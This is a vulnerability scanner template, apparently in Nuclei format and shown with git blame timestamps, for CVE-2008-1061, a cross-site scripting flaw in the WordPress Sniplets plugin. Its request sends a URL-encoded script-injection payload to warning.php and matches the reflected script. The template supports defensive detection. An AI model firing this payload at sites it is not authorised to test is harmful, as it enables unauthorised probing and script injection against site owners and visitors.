2022-08-10 07:34:05 +00:00
id : CVE-2008-1061
2022-02-15 12:05:52 +00:00
info :
2022-09-08 13:28:46 +00:00
name : WordPress Sniplets <=1.2.2 - Cross-Site Scripting
2022-02-15 12:05:52 +00:00
author : dhiyaneshDK
2023-07-11 19:49:27 +00:00
severity : medium
2022-08-10 07:34:05 +00:00
description : |
2022-09-08 13:28:46 +00:00
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
2023-09-06 13:22:34 +00:00
remediation : |
Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/5194
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
2022-08-10 07:34:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
2022-10-10 19:40:25 +00:00
- http://securityreason.com/securityalert/3706
2023-07-15 16:29:17 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/40830
2022-08-30 17:53:03 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score : 4.3
2022-08-30 17:53:03 +00:00
cve-id : CVE-2008-1061
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00938
2023-08-31 11:46:18 +00:00
epss-percentile : 0.81093
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wordpress
product : sniplets_plugin
tags : xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
2022-02-15 12:05:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-15 12:05:52 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition : and
matchers :
- type : word
part : body
words :
- "</script><script>alert(document.domain)</script>"
- type : word
part : header
words :
- text/html
- type : status
status :
- 200